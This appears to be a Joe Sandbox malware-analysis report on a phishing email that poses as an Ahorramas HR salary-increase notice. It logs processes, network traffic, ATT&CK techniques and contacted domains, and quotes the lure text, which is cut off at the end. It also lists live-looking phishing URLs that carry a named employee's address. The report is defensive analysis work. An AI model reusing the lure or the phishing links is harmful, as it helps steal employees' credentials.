Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65377
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65410
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65415
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65416
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65413
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65414
Source: unknownHTTPS traffic detected: 20.190.159.4:443 -> 192.168.2.16:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.159.4:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:65416 version: TLS 1.2
Source: classification engineClassification label: mal56.phis.winEML@25/32@38/117
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241115T0500320420-2528.etl
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\704b67b5-6bc9-dbd5-0710-60eb98e03983.eml"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "433F257D-565F-4ACE-9A4A-77EDAE2242C0" "841D5194-392F-4B0D-90F2-91DE94DB94BC" "2528" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://tdmmv2467vengtbhl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2028,i,14780805822871355243,6275632994344914433,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "433F257D-565F-4ACE-9A4A-77EDAE2242C0" "841D5194-392F-4B0D-90F2-91DE94DB94BC" "2528" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://tdmmv2467vengtbhl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2028,i,14780805822871355243,6275632994344914433,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\outlook\ConfigContextData 1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid AccountsWindows Management Instrumentation2
Browser Extensions		1
Process Injection		1
Masquerading		OS Credential Dumping1
Process Discovery		Remote ServicesData from Local System2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scripting		1
DLL Side-Loading		1
Modify Registry		LSASS Memory12
System Information Discovery		Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading		1
Registry Run Keys / Startup Folder		1
Process Injection		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron1
Registry Run Keys / Startup Folder		Login Hook1
DLL Side-Loading		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
jsdelivr.map.fastly.net
151.101.129.229
truefalse
    		high
    bg.microsoft.map.fastly.net
    		199.232.214.172
    		truefalse
      		high
      a.nel.cloudflare.com
      		35.190.80.1
      		truefalse
        		high
        tdmmv2467vengtbhl3e.citq.de
        		172.67.202.97
        		truetrue
          		unknown
          sni1gl.wpc.upsiloncdn.net
          		152.199.21.175
          		truefalse
            		high
            cdnjs.cloudflare.com
            		104.17.24.14
            		truefalse
              		high
              ipinfo.io
              		34.117.59.81
              		truefalse
                		high
                challenges.cloudflare.com
                		104.18.94.41
                		truefalse
                  		high
                  s-part-0017.t-0009.t-msedge.net
                  		13.107.246.45
                  		truefalse
                    		high
                    sni1gl.wpc.omegacdn.net
                    		152.199.21.175
                    		truefalse
                      		high
                      www.google.com
                      		172.217.16.196
                      		truefalse
                        		high
                        ahorramas-5ocglii6fvrlmr.wroy.de
                        		188.114.97.3
                        		truetrue
                          		unknown
                          aadcdn.msauthimages.net
                          		unknown
                          		unknownfalse
                            		high
                            cdn.jsdelivr.net
                            		unknown
                            		unknownfalse
                              		high
                              aadcdn.msftauth.net
                              		unknown
                              		unknownfalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://tdmmv2467vengtbhl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvktrue
                                  		unknown
                                  https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrfalse
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    142.250.186.67
                                    		unknownUnited States
                                    		15169GOOGLEUSfalse
                                    216.58.212.142
                                    		unknownUnited States
                                    		15169GOOGLEUSfalse
                                    13.107.246.45
                                    		s-part-0017.t-0009.t-msedge.netUnited States
                                    		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                    151.101.129.229
                                    		jsdelivr.map.fastly.netUnited States
                                    		54113FASTLYUSfalse
                                    104.18.94.41
                                    		challenges.cloudflare.comUnited States
                                    		13335CLOUDFLARENETUSfalse
                                    2.19.126.160
                                    		unknownEuropean Union
                                    		16625AKAMAI-ASUSfalse
                                    40.79.167.8
                                    		unknownUnited States
                                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                    199.232.214.172
                                    		bg.microsoft.map.fastly.netUnited States
                                    		54113FASTLYUSfalse
                                    35.190.80.1
                                    		a.nel.cloudflare.comUnited States
                                    		15169GOOGLEUSfalse
                                    172.67.202.97
                                    		tdmmv2467vengtbhl3e.citq.deUnited States
                                    		13335CLOUDFLARENETUStrue
                                    142.250.184.202
                                    		unknownUnited States
                                    		15169GOOGLEUSfalse
                                    52.113.194.132
                                    		unknownUnited States
                                    		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                    104.17.24.14
                                    		cdnjs.cloudflare.comUnited States
                                    		13335CLOUDFLARENETUSfalse
                                    151.101.1.229
                                    		unknownUnited States
                                    		54113FASTLYUSfalse
                                    34.117.59.81
                                    		ipinfo.ioUnited States
                                    		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                    104.18.95.41
                                    		unknownUnited States
                                    		13335CLOUDFLARENETUSfalse
                                    64.233.167.84
                                    		unknownUnited States
                                    		15169GOOGLEUSfalse
                                    239.255.255.250
                                    		unknownReserved
                                    		unknownunknownfalse
                                    188.114.97.3
                                    		ahorramas-5ocglii6fvrlmr.wroy.deEuropean Union
                                    		13335CLOUDFLARENETUStrue
                                    52.109.28.47
                                    		unknownUnited States
                                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                    52.109.28.46
                                    		unknownUnited States
                                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                    188.114.96.3
                                    		unknownEuropean Union
                                    		13335CLOUDFLARENETUSfalse
                                    152.199.21.175
                                    		sni1gl.wpc.upsiloncdn.netUnited States
                                    		15133EDGECASTUSfalse
                                    172.217.16.196
                                    		www.google.comUnited States
                                    		15169GOOGLEUSfalse
                                    172.217.16.131
                                    		unknownUnited States
                                    		15169GOOGLEUSfalse

                                    Private

                                    IP
                                    192.168.2.16

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1556391
                                    Start date and time:2024-11-15 11:00:02 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:16
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • EGA enabled
                                    Analysis Mode:stream
                                    Analysis stop reason:Timeout
                                    Sample name:704b67b5-6bc9-dbd5-0710-60eb98e03983.eml
                                    Detection:MAL
                                    Classification:mal56.phis.winEML@25/32@38/117
                                    Cookbook Comments:
                                    • Found application associated with file extension: .eml

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.109.28.47, 2.19.126.160, 2.19.126.151, 52.113.194.132, 199.232.214.172
                                    • Excluded domains from analysis (whitelisted): omex.cdn.office.net, ecs.office.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, eur.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, s-0005-office.config.skype.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, uks-azsc-000.roaming.officeapps.live.com, s-0005.s-msedge.net, config.officeapps.live.com, officeclient.microsoft.com, ecs.office.trafficmanager.net, omex.cdn.office.net.akamaized.net, wu-b-net.trafficmanager.net, europe.configsvc1.live.com.akadns.net, uks-azsc-config.officeapps.live.com, a1864.dscd.akamai.net
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • VT rate limit hit for: 704b67b5-6bc9-dbd5-0710-60eb98e03983.eml

                                    LLM Input / Output

                                    InputOutput
                                    URL: email Model: Joe Sandbox AI
                                    {
    "explanation": [
        "The sender's email domain 'denasabuildcon.com' does not match the claimed organization Ahorramas",
        "The email contains suspicious URLs with random strings and redirects through 'citq.de' instead of legitimate ahorramas.com domain",
        "Multiple repetitive content and suspicious formatting suggests automated phishing template"
    ],
    "phishing": true,
    "confidence": 10
}
                                    {
    "date": "Thu, 14 Nov 2024 17:46:13 -1200", 
    "subject": "Ahorramas RR.HH.: Notificacin de Mejora Salarial", 
    "communications": [
        " Detalles del Aumento Salarial - Noviembre 2024 La identidad de este remitente est confirmada por la lista de remitentes de confianza. Detalles del Aumento Salarial - Noviembre 2024 Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO Estimado/a Fernando.batuecas, A continuacin, encontrar los detalles de la hoja de tiempo y su aumento salarial para el mes de Noviembre de 2024. ahorramas.com/Aumento-Salarial-Noviembre Si tiene alguna consulta, por favor contacte al Departamento de Nmina de Ahorramas. Atentamente, Ahorramas Administrador de Nmina de Director de Nmina y RR.HH. | Sede Central https://www.ahorramas.com Message ID: vEngTBHl3e69837tDmmV7099446787 Detalles del Aumento Salarial - Noviembre 2024 body { font-family: Arial, sans-serif; } .container { width: 800px; margin: 0 auto; padding: 20px; border: 1px solid #ddd; border-radius: 5px; } .header, .content, .footer { text-align: center; margin-bottom: 20px; } .elementToProof { border: 0; margin: 0; padding: 12px; background-color: #eaeaea; font-family: Helvetica, Arial, sans-serif; } table { border-collapse: collapse; width: 100%; } th, td { padding: 5px; } th { background-color: #029740; color: #fff; } td { background-color: #f3fff8; } .btn { display: inline-block; padding: 12px 24px; color: #333; background-color: #ffc423; text-decoration: none; border-radius: 2px; font-weight: bold; font-size: 15px; } .btn img { vertical-align: middle; margin-right: 8px; } .footer 